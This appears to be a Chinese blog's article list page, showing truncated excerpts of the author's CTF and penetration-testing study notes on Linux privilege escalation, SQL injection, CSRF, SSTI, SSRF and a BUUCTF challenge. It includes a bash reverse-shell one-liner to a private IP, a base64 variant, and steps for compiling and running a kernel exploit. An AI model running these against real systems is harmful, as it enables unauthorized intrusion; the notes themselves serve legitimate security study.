文章列表

8.3k8 分钟

最简单的就是猜一猜是不是和之前的密码是同一个 # 内核漏洞 在得到的shell上查询版本:uname -a在kali搜索改版本存在的漏洞:searchsploit linux 3.2.78下载后上传,可能需要编译:gcc -pthread 40839.c -o 40839 -lcrypt运行后可能会得到一个新的账户,切换过去:su firefart# SUID 配置 SUID(Set User ID)是 Linux/Unix 系统中的一种特殊权限,其作用是:当一个文件被设置了 SUID 权限,用户执行该文件时,会临时获得文件所有者的权限 例如 passwd 命令的所有者是 root
4.7k4 分钟

最最最最最基础简单的部分 (虽然它简单但是不等于我记得,更不等于我会.jpg) SQL 提权见 linux 提权 # 基本语句 先明确一件事,所有的查询语句,查的都是数据,而不是字段之类 select database() //这是查当前数据库,如果是要查所有,是; select group_concat(schema_name) from information_schema.schemate才对 注意,只有在information_schema.schemate中才存在字段schema_name,在其他两个表中都会叫做table_schema,但是在informati
12k11 分钟

重置未完 # requests # 请求 基本用法: r.text 就是整个响应。get 传的参数直接写 url 里,或者传个字典 (params=...)。 type (r.text) 为 str,且是 json 格式(反正不是就会报错,试一试总是好的.jpg),可以使用 r.json (),将其转化为字典。 其他方法: post 传参此时就只能传字典,data=... 在请求体中位于 form 部分 # 设置请求头 也是传字典,headers=... # 响应 其中 r.context 就是网页源码 # 爬取二进制数据 网页上传输的非文本都是用的二进
1.5k1 分钟

CSRF 跨站请求伪造,与 XSS 不同,XSS 是利用站内信任用户而 CSRF 是伪装信任用户(当网站使用 cookie 标明身份时,在用户没有登出该网站的情况下访问其他危险网站,危险网站使用其在该网站上的 cookie 伪装成用户发起请求)。 所以前提是:本地生成 Cookie, 不登出就访问危险网站 # GET 例子: # POST 大多 CSRF 用的都是 <img>,<iframe>,<script > 这种带 src 属性的标签,这类标签只能发出一次 GET 请求。 所以如果是使用 POST 方法进行传参的网站: 在后端的参数是_$REQUES
8.6k8 分钟

SSTI (服务器端模板注入,Server-Side Template Injection) 由于不知道哪里的 bug,查看图片需要在检查中手动把 data-src 改成 src # 介绍 漏洞成因是服务端接收了用户的恶意输入以后,未经任何处理就将其作为 Web 应用模板内容的一部分,模板引擎在进行目标编译渲染的过程中,执行了用户插入的可以破坏模板的语句,因而可能导致了敏感信息泄露、代码执行、GetShell 等问题。 凡是使用模板的地方都可能会出现 SSTI 的问题,这不是模版引擎导致的问题。 以 PHP 模版引擎 Twig 为例: <?php  require_once dirna
8931 分钟

# 反弹 shell bash: bash -i >& /dev/tcp/192.168.99.242/1234 0>&1//-i 表示交互模式,>&将标准输出以及错误重定向,/dev...是使用特殊文件进行tcp连接,0>&1是将标准输入重定向。注意:0是标准输入,1是标准输出,2是标准错误。>&是组合操作符,同时操作标准输出和错误,也可以指定。base64版:bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3R
13k12 分钟

# [SUCTF 2019]EasySQL buu 上的,百度下有题解,这里说点有趣的 关于最后 payload 还有查询语句: select $_GET['query'] || flag from flag 这里的 II 应该是逻辑或,当使用任意一个数字(常数列)与其或时,返回的只会是常数列。所以 payload 是 *,任意数字 ,因为 *||flag 是非法的,即使是开启了所谓的字符串拼接也是不对的。 但是似乎这道题其实没有开字符串拼接,输入 *,1 返回的是: Array ( [0] => flag{c32cc085-3992-43d4-948a-
1971 分钟

抽象,这商家甚至还说要顺网线来找,从没见过这么离谱的商家,没理也要急。 看了一眼评论,算我买的时候走眼了(pdd 申诉通过了,退回来了,不过看到就来气,打算改天销了。)。
3.9k4 分钟

# 正文 可以从 URL 关键字中寻找漏洞 share 通常表示分享功能 wap 表示这是针对移动设备优化的版本 url 通常用于重定向 link 获取某个东西 src 就是 src source 指定数据来源 target 用于指定表单提交后用于处理的文件 u url 的简写 display 控制图片显示方式 sourceURL 待下载文件的地址 imageURL 指定页面显示的图片的地址 domain 后跟域名 产生漏洞的函数 PHP file_get_contents() -- 支持 php://input 协议